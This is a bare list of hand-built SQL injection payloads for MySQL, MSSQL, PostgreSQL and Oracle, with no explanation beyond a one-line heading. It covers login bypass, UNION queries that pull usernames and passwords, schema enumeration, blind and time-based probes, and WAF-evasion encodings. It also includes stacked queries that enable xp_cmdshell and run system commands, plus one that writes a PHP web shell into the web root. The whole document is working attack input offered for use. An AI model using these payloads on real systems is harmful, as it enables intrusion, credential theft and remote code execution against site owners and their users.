Hand-built SQL injection payloads — auth bypass, UNION extraction, schema enum, error/blind/time-based, stacked-query RCE and WAF bypasses across MySQL, MSSQL, PostgreSQL and Oracle.
' OR '1'='1
' OR 1=1-- -
admin'-- -
") OR ("1"="1
' OR 1=1#
'+OR+'x'='x
' ORDER BY 5-- -
' UNION SELECT NULL,NULL,NULL-- -
' UNION SELECT 1,2,3-- -
' UNION SELECT NULL,@@version,NULL-- -
' UNION SELECT username,password,3 FROM users-- -
' UNION SELECT NULL,group_concat(username,0x3a,password),NULL FROM users-- -
' UNION SELECT table_name,2,3 FROM information_schema.tables-- -
' UNION SELECT column_name,2,3 FROM information_schema.columns WHERE table_name='users'-- -
' UNION SELECT schema_name,2,3 FROM information_schema.schemata-- -
' UNION SELECT banner,2,3 FROM v$version-- -
' UNION SELECT string_agg(table_name,','),2,3 FROM information_schema.tables-- -
' AND extractvalue(1,concat(0x7e,(SELECT @@version)))-- -
' AND updatexml(1,concat(0x7e,(SELECT user())),1)-- -
' AND 1=convert(int,(SELECT @@version))-- -
' AND 1=cast((SELECT version()) as int)-- -
' AND 1=1-- -
' AND 1=2-- -
' AND SUBSTRING((SELECT password FROM users LIMIT 1),1,1)='a'-- -
' AND SLEEP(5)-- -
' OR IF(1=1,SLEEP(5),0)-- -
'; WAITFOR DELAY '0:0:5'-- -
' AND 1=(SELECT 1 FROM PG_SLEEP(5))-- -
'; EXEC sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE-- -
'; EXEC xp_cmdshell 'whoami'-- -
'; COPY (SELECT '') TO PROGRAM 'id'-- -
' UNION SELECT '<?php system($_GET[0]);?>',2,3 INTO OUTFILE '/var/www/html/s.php'-- -
' /*!50000UNION*/ /*!50000SELECT*/ 1,2,3-- -
' UnIoN sElEcT 1,2,3-- -
'/**/OR/**/1=1-- -
'%09OR%091=1-- -
' UNION ALL SELECT 1,2,3-- -
%2527%2520OR%25201=1